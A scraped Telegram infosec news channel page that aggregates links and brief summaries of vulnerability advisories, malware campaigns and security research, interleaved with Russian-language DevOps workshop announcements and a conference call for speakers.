sysadm_in_channel | Технологии

Telegram-канал sysadm_in_channel - Sys-Admin InfoSec

12336

News of cybersecurity / information security, information technology, data leaks / breaches, cve, hacks, tools, trainings * Multilingual (En, Ru). * Forum - forum.sys-adm.in * Chat - @sysadm_in * Job - @sysadm_in_job * ? - @sysadminkz

Подписаться на канал

Sys-Admin InfoSec

/ Out of the shadows – ’darcula’ iMessage and RCS smishing attacks target USPS and global postal services

https://www.netcraft.com/blog/darcula-smishing-attacks-target-usps-and-global-postal-services/

Читать полностью…

Sys-Admin InfoSec

/ Alert: PROXYLIB and LumiApps Transform Mobile Devices into Proxy Nodes

Residential proxies are frequently used by threat actors to conceal malicious activity, including advertising fraud and the use of bots. Access to residential proxy networks is often purchased from other threat actors who create them through enrolling unwitting users’ devices as nodes in the network through malware embedded in mobile, CTV or desktop applications...

How VPN app can convert your device to malicious proxy node:

https://www.humansecurity.com/learn/blog/satori-threat-intelligence-alert-proxylib-and-lumiapps-transform-mobile-devices-into-proxy-nodes

Читать полностью…

Sys-Admin InfoSec

/ ZenHammer: Rowhammer Attacks on AMD Zen-based Platforms

https://comsec.ethz.ch/research/dram/zenhammer/

Читать полностью…

Sys-Admin InfoSec

/ AWS one-click account takeover vulnerability...

..one-click account takeover vulnerability in the AWS Managed Workflows Apache Airflow service that could have allowed full takeover of a victim’s web management panel of the Airflow instance:

https://www.tenable.com/blog/flowfixation-aws-apache-airflow-service-takeover-vulnerability-and-why-neglecting-guardrails

Читать полностью…

Sys-Admin InfoSec

/ SQLi (SQL Injection) org.postgresql:postgresql Dependency in Bamboo Data Center and Server

This Critical severity org.postgresql:postgresql Dependency vulnerability was introduced in versions 8.2.1, 9.0.0, 9.1.0, 9.2.1, 9.3.0, 9.4.0, and 9.5.0 of Bamboo Data Center and Server.

https://jira.atlassian.com/browse/BAM-25716

Читать полностью…

Sys-Admin InfoSec

/ Interesting Multi-Stage StopCrypt Ransomware Variant Propagating in the Wild

*with bypass antivirus

https://blog.sonicwall.com/en-us/2024/03/new-multi-stage-stopcrypt-ransomware/

Читать полностью…

Sys-Admin InfoSec

/ DarkGate Operators Exploit Microsoft Windows SmartScreen Bypass in Zero-Day Campaign

https://www.trendmicro.com/en_us/research/24/c/cve-2024-21412--darkgate-operators-exploit-microsoft-windows-sma.html

Читать полностью…

Sys-Admin InfoSec

/ FortiOS & FortiProxy - Out-of-bounds Write in captive portal

..may allow an inside attacker who has access to captive portal to execute arbitrary code or commands via specially crafted HTTP requests:

https://www.fortiguard.com/psirt/FG-IR-23-328

Читать полностью…

Sys-Admin InfoSec

📢 Integration of OpenBLD.net with URLhaus by abuse.ch

URLhaus is a project operated by abuse.ch. Its purpose is to collect, track, and share malware URLs, aiding network administrators and security analysts in safeguarding their networks and customers from cyber threats.

Now, you can check the malicious domain ownership with OpenBLD.net alongside Quad9, AdGuard, Cloudflare, ProtonDNS on abuse.ch.

In addition, you can incorporate abuse.ch lists into your security solutions, just as OpenBLD.net does.

You can check this as example on:
🔹 https://urlhaus.abuse.ch/host/dukeenergyltd.top

Here's to security for us all. Cheers!)

Читать полностью…

Sys-Admin InfoSec

📢 Открытый практикум DevOps by Rebrain: HTTPS в Nginx и Angie

Время:

• 12 Марта (Вторник) 19:00 МСК

Программа:

• Разбираем принципы TLS и HTTPS
• Учимся получать бесплатные сертификаты
• Автоматизируем их обновление
• Настраиваем быстрый и безопасный HTTPS для сайта

Детали

Ведёт:

Николай Лавлинский – Веб-разработчик более 15 лет. Спикер конференций HighLoad++, РИТ++. Специализация: ускорение сайтов и веб-приложений.

Читать полностью…

Sys-Admin InfoSec

/ WogRAT Malware Exploits aNotepad (Windows, Linux)

AhnLab Security intelligence Center (ASEC) has recently discovered the distribution of backdoor malware via aNotepad, a free online notepad platform. Said malware supports both the PE format that targets the Windows system and the ELF format that targets the Linux system. As the threat actor used the string ‘WingOfGod’ during the development of the malware, it is classified as WogRAT:

https://asec.ahnlab.com/en/62446/

Читать полностью…

Sys-Admin InfoSec

/ VMware ESXi, Workstation, and Fusion contain a use-after-free vulnerability (Critical)

A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host..:

https://www.vmware.com/security/advisories/VMSA-2024-0006.html

Читать полностью…

Sys-Admin InfoSec

/ 0-Click Account Takeover on Facebook

https://infosecwriteups.com/0-click-account-takeover-on-facebook-e4120651e23e

Читать полностью…

Sys-Admin InfoSec

📢 Открытый практикум Linux by Rebrain: LVM - первая часть

Время:

• 6 Марта (Среда) 20:00 МСК

Программа:

• От логических разделов к логическим томам
• PV, VG, LV
• Практика работы с LVM - создание LV, манипуляции со свободным пространством

Детали

Ведёт:

Андрей Буранов – Системный администратор в департаменте VK Play. 10+ лет опыта работы с ОС Linux.

Читать полностью…

Sys-Admin InfoSec

📢 AppSecFest Объявляет CFP набор 🚀

AppSecFest 2024 ориентировочно пройдет ~3 мая в Almaty, будет разделен на несколько зон:

🔹 App Zone: сосредоточен на трендах разработки ПО (mobile, web, блокчейн, микросервисы и т.п.). Трендах Dev и DevOps AI/ML в SDLC.
🔹 Sec Zone: актуальная безопасность приложений (SAST, SCA, DAST, RASP. API, IaC и Container Security. ASTO, WAF, IAST, MAST, Secrets Management). Векторы атак и управление уязвимостями

Нужны спикеры! Ты специалист в App/Sec? Тогда welcome to CFP:
🔹 https://forms.gle/EBAAArtHtoCmSMri7

Читать полностью…

Sys-Admin InfoSec

📢 Открытый практикум: Кросс-командные взаимодействия - учимся жить дружно

Время:

• 2 Апреля (Вторник) 19:00 МСК

Программа:

• Предпосылки для построения или изменения процесса взаимодействия
• Построение процесса взаимодействия команд DEV, QA с DevOps командой, когда вы единая служба
• Построение процесса работы DevOps с OPS/support

Детали

Ведёт:

Александр Крылов – Опыт работы в DevOps более 7 лет. Спикер конференций: DevOps conf, TeamLead conf, Highload conf. Автор курса по Haproxy на Rebrain.

Читать полностью…

Sys-Admin InfoSec

/ The latest emerging C2 was primarily focused on Asus devices, and grew to over 6,000 bots in a period of 72 hours.

ASUS routers under attack:

https://blog.lumen.com/the-darkside-of-themoon/

Читать полностью…

Sys-Admin InfoSec

/ GoFetch is a microarchitectural side-channel attack that can extract secret keys from constant-time cryptographic implementations via data memory-dependent prefetchers (DMPs).

https://gofetch.fail/

Читать полностью…

Sys-Admin InfoSec

📢 Открытый практикум DevOps by Rebrain: Как выживать инженеру в потоке тонны звонков

Время:

• 26 Марта (Вторник) 19:00 МСК

Программа:

• Подходы к оптимизации времени
• Фреймворк потока
• Капсульный подход управления календарём
• Тулсет

Регистрация

Ведёт:

Александр Крылов – Опыт работы в DevOps более 7 лет. Спикер конференций: DevOps conf, TeamLead conf, Highload conf. Автор курса по Haproxy на Rebrain.

Читать полностью…

Sys-Admin InfoSec

/ UDP-based, application-layer protocol implementations are vulnerable to network loops

..An unauthenticated attacker can use maliciously-crafted packets against a UDP-based vulnerable implementation of application protocols (e.g., DNS, NTP, TFTP) that can lead to Denial-of-Service (DOS) and/or abuse of resources..:

https://kb.cert.org/vuls/id/417980

Читать полностью…

Sys-Admin InfoSec

/ What a Cluster: Local Volumes Vulnerability in Kubernetes

https://www.akamai.com/blog/security-research/kubernetes-local-volumes-command-injection-vulnerability-rce-system-privileges

Читать полностью…

Sys-Admin InfoSec

📢 Открытый практикум: Выбираем форк MySQL от Oracle до MariaDB

Время:

• 19 Марта (Вторник) 19:00 МСК

Программа:

• Обзор открытых форков в экосистеме MySQL
• Oracle MySQL
• Percona Server for MySQL
• MariaDB
• Совместимость, возможности перехода
• Сравнение функциональности

Детали

Ведёт:

Николай Лавлинский – Веб-разработчик более 15 лет. Спикер конференций HighLoad++, РИТ++. Специализация: ускорение сайтов и веб-приложений.

Читать полностью…

Sys-Admin InfoSec

/ MAGNET GOBLIN TARGETS PUBLICLY FACING SERVERS USING 1-DAY VULNERABILITIES

https://research.checkpoint.com/2024/magnet-goblin-targets-publicly-facing-servers-using-1-day-vulnerabilities/

Читать полностью…

Sys-Admin InfoSec

/ Cisco Secure Client Carriage Return Line Feed Injection Vulnerability (high)

Cisco Secure Client could allow an unauthenticated, remote attacker to conduct a carriage return line feed (CRLF) injection attack against a user:

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-secure-client-crlf-W43V4G7

Читать полностью…

Sys-Admin InfoSec

/ Spinning YARN - A New Linux Malware Campaign Targets Docker, Apache Hadoop, Redis and Confluence

Cado Security Labs researchers have recently encountered an emerging malware campaign targeting misconfigured servers running the following web-facing services.

- Apache Hadoop YARN,
- Docker,
- Confluence and
- Redis

Detailed research - Details

Читать полностью…

Sys-Admin InfoSec

/ Apple pathes OS 17.4 and iPadOS 17.4

Impact: An app may be able to read sensitive location information:

https://support.apple.com/en-us/HT214081

Читать полностью…

Sys-Admin InfoSec

😡 OpenBLD.net - Phobos Ransomware Attack Mitigations

The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint CSA, to disseminate known TTPs and IOCs associated with the Phobos ransomware variants observed as recently as February 2024...

Phobos actors run executables like 1saas.exe or cmd.exe to deploy additional Phobos payloads that have elevated privileges enabled. Additionally, Phobos actors can use the previous commands to perform various windows shell functions. The Windows command shell enables threat actors to control various aspects of a system, with multiple permission levels required for different subsets of commands.

How to mitigate risks:
- Secure RDP
- Reduce administratiove provigese scoping
- Use OpenBLD.net or similar services

Technical details on CISA site:
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-060a

Читать полностью…

Sys-Admin InfoSec

/ Data Scientists Targeted by Malicious Hugging Face ML Models with Silent Backdoor

How can loading an ML model lead to payload code execution? Analysis:

https://jfrog.com/blog/data-scientists-targeted-by-malicious-hugging-face-ml-models-with-silent-backdoor/

Читать полностью…

Sys-Admin InfoSec

/ XSS Vulnerability in LiteSpeed Cache Plugin Affecting 4+ Million Sites

The plugin LiteSpeed Cache (free version), which has over 4 million active installations, is known as the most popular caching plugin in WordPress.

This plugin suffers from unauthenticated site-wide stored XSS vulnerability and could allow any unauthenticated user from stealing sensitive information to, in this case, privilege escalation on the WordPress site by performing a single HTTP request.

https://patchstack.com/articles/xss-vulnerability-in-litespeed-cache-plugin-affecting-4-million-sites/

Читать полностью…

Sys-Admin InfoSec

/ Announcing bpftop: Streamlining eBPF performance optimization

https://netflixtechblog.com/announcing-bpftop-streamlining-ebpf-performance-optimization-6a727c1ae2e5

Читать полностью…
Подписаться на канал